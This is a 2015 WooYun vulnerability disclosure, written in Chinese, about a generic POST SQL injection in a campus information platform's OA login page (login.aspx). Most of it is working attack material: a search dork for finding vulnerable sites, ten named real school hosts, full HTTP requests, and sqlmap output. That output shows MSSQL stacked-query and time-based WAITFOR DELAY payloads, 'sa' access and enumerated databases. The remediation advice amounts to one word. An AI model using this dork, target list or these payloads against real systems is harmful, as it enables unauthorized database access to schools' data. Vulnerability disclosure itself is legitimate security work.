漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-090309
漏洞标题:某校园信息平台OA系统#通用型POST注入
相关厂商:center互联网应急响应中心
漏洞作者: 路人甲
提交时间:2015-01-09 12:06
修复时间:2015-04-13 16:58
公开时间:2015-04-13 16:58
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-01-09: 细节已通知厂商并且等待厂商处理中
2015-01-14: 厂商已经确认,细节仅向厂商公开
2015-01-17: 细节向第三方安全合作伙伴开放
2015-03-10: 细节向核心白帽子及相关领域专家公开
2015-03-20: 细节向普通白帽子公开
2015-03-30: 细节向实习白帽子公开
2015-04-13: 细节向公众公开
简要描述:
POST
详细说明:
POST注入
漏洞证明:
关键字:intitle:校园信息平台 inurl:oa/login.aspx
测试站点:
http://all.hzvtc.edu.cn/OA/login.aspx
http://pt.szai.edu.cn/oa/login.aspx
http://59.50.76.151/oa/login.aspx
http://220.163.121.7/oa/login.aspx
http://crp.dzvtc.cn/OA/login.aspx
http://221.224.34.42/oa/login.aspx
http://218.22.68.206/oa/login.aspx
http://211.70.248.75/oa/login.aspx
http://222.195.192.201/oa/login.aspx
http://58.16.202.83/oa/login.aspx
测试如下:
http://all.hzvtc.edu.cn/OA/login.aspx
POST /OA/login.aspx HTTP/1.1
Host: all.hzvtc.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://all.hzvtc.edu.cn/OA/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYYsTPPHo4qZmORHe56val4GZNlb5A%3D%3D&__EVENTVALIDATION=%2FwEWBALC34%2FhDwKH4Yn8AQKu8uE5AvKm2soE8g1mnhKK8S6ycl3%2Fp7j6CWxOOJs%3D&txt_%BF%A8%BA%C5=e&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZjCVbGZewKZKxtepFDTubDV8ZLHw==&__EVENTVALIDAT
ION=/wEWBAK9ibmcBwKH4Yn8AQKu8uE5AvKm2soE3UibBe4GsZ6jwWetXTaah5zuBTw=&txt_%BF%A8%
BA%C5=e'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Bu
tton_%B5%C7%C2%BD.y=23
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZjCVbGZewKZKxtepFDTubDV8ZLHw==&__EVENTVALIDAT
ION=/wEWBAK9ibmcBwKH4Yn8AQKu8uE5AvKm2soE3UibBe4GsZ6jwWetXTaah5zuBTw=&txt_%BF%A8%
BA%C5=e' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&But
ton_%B5%C7%C2%BD.y=23
---
[15:15:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:15:47] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\ou
tput\all.hzvtc.edu.cn'
current user: 'sa'
current database: 'CRP'
available databases [8]:
[*] [t?????G\n?y]
[*] CRP
[*] joffice2
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
http://pt.szai.edu.cn/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: pt.szai.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://pt.szai.edu.cn/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbTYqplOA6yzUCrC%2BYMndrJl1fFbA%3D%3D&__EVENTVALIDATION=%2FwEWBALk2o%2F4AwKH4Yn8AQKu8uE5AvKm2soEJ9FonmSXog%2B2pfSpDStyD0BU2hM%3D&txt_%BF%A8%BA%C5=w&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=29&Button_%B5%C7%C2%BD.y=14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDAT
ION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%
BA%C5=w'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=29&Bu
tton_%B5%C7%C2%BD.y=14
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDAT
ION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%
BA%C5=w' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=29&But
ton_%B5%C7%C2%BD.y=14
---
[15:15:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:15:47] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\ou
tput\pt.szai.edu.cn'
current user: 'sa'
current database: 'CRP'
available databases [8]:
[*] [t?????G\n?y]
[*] CRP
[*] joffice2
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
http://59.50.76.151/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 59.50.76.151
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://59.50.76.151/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYa9T3LkVQ%2Fy%2FRTz0mHqgq6%2FL%2BL6%2Bw%3D%3D&__EVENTVALIDATION=%2FwEWBAKLys%2BQAQKH4Yn8AQKu8uE5AvKm2soEj1zn80cQlKktA%2F%2F8ezR1hDFSWFc%3D&txt_%BF%A8%BA%C5=w&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=120&Button_%B5%C7%C2%BD.y=20
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYYRxBuN87gva2cJmqXfA7ZeRLb2SA==&__EVENTVALIDAT
ION=/wEWBALPkfWFAgKH4Yn8AQKu8uE5AvKm2soEGEej2A/mGA4ud /4vP7BVTgKxdw=&txt_%BF%A8%
BA%C5=w'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=120&B
utton_%B5%C7%C2%BD.y=20
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYYRxBuN87gva2cJmqXfA7ZeRLb2SA==&__EVENTVALIDAT
ION=/wEWBALPkfWFAgKH4Yn8AQKu8uE5AvKm2soEGEej2A/mGA4ud /4vP7BVTgKxdw=&txt_%BF%A8%
BA%C5=w' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=120&Bu
tton_%B5%C7%C2%BD.y=20
---
[15:44:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:44:54] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\ou
tput\59.50.76.151'
current user: 'sa'
current database: 'CRP'
http://220.163.121.7/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 220.163.121.7
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://220.163.121.7/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbVqTb47geYOQ5m4gN4FsL61r%2FU2A%3D%3D&__VIEWSTATEGENERATOR=1C793C42&__EVENTVALIDATION=%2FwEWBAKKupvhBgKH4Yn8AQKu8uE5AvKm2soEs37MtIx8oiam7E9IbJUFfCfzjr4%3D&txt_%BF%A8%BA%C5=w&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=45&Button_%B5%C7%C2%BD.y=27
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZow7mNzJxWVB6Pe3Hi4T9M I9BeQ==&__VIEWSTATEGEN
ERATOR=1C793C42&__EVENTVALIDATION=/wEWBAKN/JnjCQKH4Yn8AQKu8uE5AvKm2soENY52zREHbp
92pg 5NUF0Pd 0cmc=&txt_%BF%A8%BA%C5=w'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB
=w&Button_%B5%C7%C2%BD.x=45&Button_%B5%C7%C2%BD.y=27
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZow7mNzJxWVB6Pe3Hi4T9M I9BeQ==&__VIEWSTATEGEN
ERATOR=1C793C42&__EVENTVALIDATION=/wEWBAKN/JnjCQKH4Yn8AQKu8uE5AvKm2soENY52zREHbp
92pg 5NUF0Pd 0cmc=&txt_%BF%A8%BA%C5=w' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=
w&Button_%B5%C7%C2%BD.x=45&Button_%B5%C7%C2%BD.y=27
---
[15:48:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:48:20] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\ou
tput\220.163.121.7'
current user: 'sa\x03'
current database: 'CRP'
http://crp.dzvtc.cn/OA/login.aspx
POST /OA/login.aspx HTTP/1.1
Host: crp.dzvtc.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://crp.dzvtc.cn/OA/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbXGIMYr3wWgB5yQQpnp9UiDi5WuQ%3D%3D&__EVENTVALIDATION=%2FwEWBALyntnHBAKH4Yn8AQKu8uE5AvKm2soEcyKYdHNODfzW1ueuDlwX8pCm5tY%3D&txt_%BF%A8%BA%C5=r&txt_%C3%DC%C2%EB=r&Button_%B5%C7%C2%BD.x=41&Button_%B5%C7%C2%BD.y=21
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbbJ KRTbxw5JF9XeEwvDQbRJRIkQ==&__EVENTVALIDAT
ION=/wEWBALFm76vCQKH4Yn8AQKu8uE5AvKm2soEgpbBinNGQJbRilFbAaH6xZB 3Tg=&txt_%BF%A8%
BA%C5=r'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=r&Button_%B5%C7%C2%BD.x=41&Bu
tton_%B5%C7%C2%BD.y=21
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbbJ KRTbxw5JF9XeEwvDQbRJRIkQ==&__EVENTVALIDAT
ION=/wEWBALFm76vCQKH4Yn8AQKu8uE5AvKm2soEgpbBinNGQJbRilFbAaH6xZB 3Tg=&txt_%BF%A8%
BA%C5=r' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=r&Button_%B5%C7%C2%BD.x=41&But
ton_%B5%C7%C2%BD.y=21
---
[15:54:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:54:14] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\ou
tput\crp.dzvtc.cn'
current user: 'sa'
current database: 'CRP'
http://221.224.34.42/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 221.224.34.42
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://221.224.34.42/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbTYqplOA6yzUCrC%2BYMndrJl1fFbA%3D%3D&__EVENTVALIDATION=%2FwEWBALk2o%2F4AwKH4Yn8AQKu8uE5AvKm2soEJ9FonmSXog%2B2pfSpDStyD0BU2hM%3D&txt_%BF%A8%BA%C5=e&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=39&Button_%B5%C7%C2%BD.y=28
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDAT
ION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%
BA%C5=e'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=39&Bu
tton_%B5%C7%C2%BD.y=28
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2x
vcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N
0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDAT
ION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%
BA%C5=e' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=39&But
ton_%B5%C7%C2%BD.y=28
---
[15:57:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:57:32] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\ou
tput\221.224.34.42'
current user: 'sa'
current database: 'CRP'
http://218.22.68.206/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 218.22.68.206
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://218.22.68.206/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYahYsMWPUseFmOfVeXnRIABVLcLWA%3D%3D&__EVENTVALIDATION=%2FwEWBAL%2F0IzXBQKH4Yn8AQKu8uE5AvKm2soEc76DRYSCPZTKfDXI1sMqdKw4qxc%3D&txt_%BF%A8%BA%C5=xssx&txt_%C3%DC%C2%EB=xss&Button_%B5%C7%C2%BD.x=63&Button_%B5%C7%C2%BD.y=24
http://211.70.248.75/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 211.70.248.75
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://211.70.248.75/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYYf%2F38tQJ1KmAqjxSAvoy3ea%2FfIOQ%3D%3D&__EVENTVALIDATION=%2FwEWBAL1k8eeDwKH4Yn8AQKu8uE5AvKm2soEtmztsHWW1NSfE5YrD1qa0gF2Jjk%3D&txt_%BF%A8%BA%C5=a&txt_%C3%DC%C2%EB=a&Button_%B5%C7%C2%BD.x=89&Button_%B5%C7%C2%BD.y=31
http://222.195.192.201/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 222.195.192.201
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.195.192.201/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 352
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYZ8%2FrbOmeEk8DRSPNbQuUI6Qdc7Og%3D%3D&__VIEWSTATEGENERATOR=1C793C42&__EVENTVALIDATION=%2FwEWBAKhs%2BzzCAKH4Yn8AQKu8uE5AvKm2soEAaH41W02RK72PESV63rCEoPbfxw%3D&txt_%BF%A8%BA%C5=re&txt_%C3%DC%C2%EB=re&Button_%B5%C7%C2%BD.x=106&Button_%B5%C7%C2%BD.y=31
http://58.16.202.83/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 58.16.202.83
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.16.202.83/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 317
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYaOukj4zrbM5Z7ULuyom6SrXls2MQ%3D%3D&__EVENTVALIDATION=%2FwEWBAL%2Ft53OCwKH4Yn8AQKu8uE5AvKm2soEo4kqYlLdKfgVy8N1L72fSonaiyM%3D&txt_%BF%A8%BA%C5=e&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=54&Button_%B5%C7%C2%BD.y=36
由于电脑卡 有限 跑数据库很慢就不一一列举了 可以深入测试的,都是存在的!
修复方案:
过滤~!
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:12
确认时间:2015-01-14 10:29
厂商回复:
最新状态:
暂无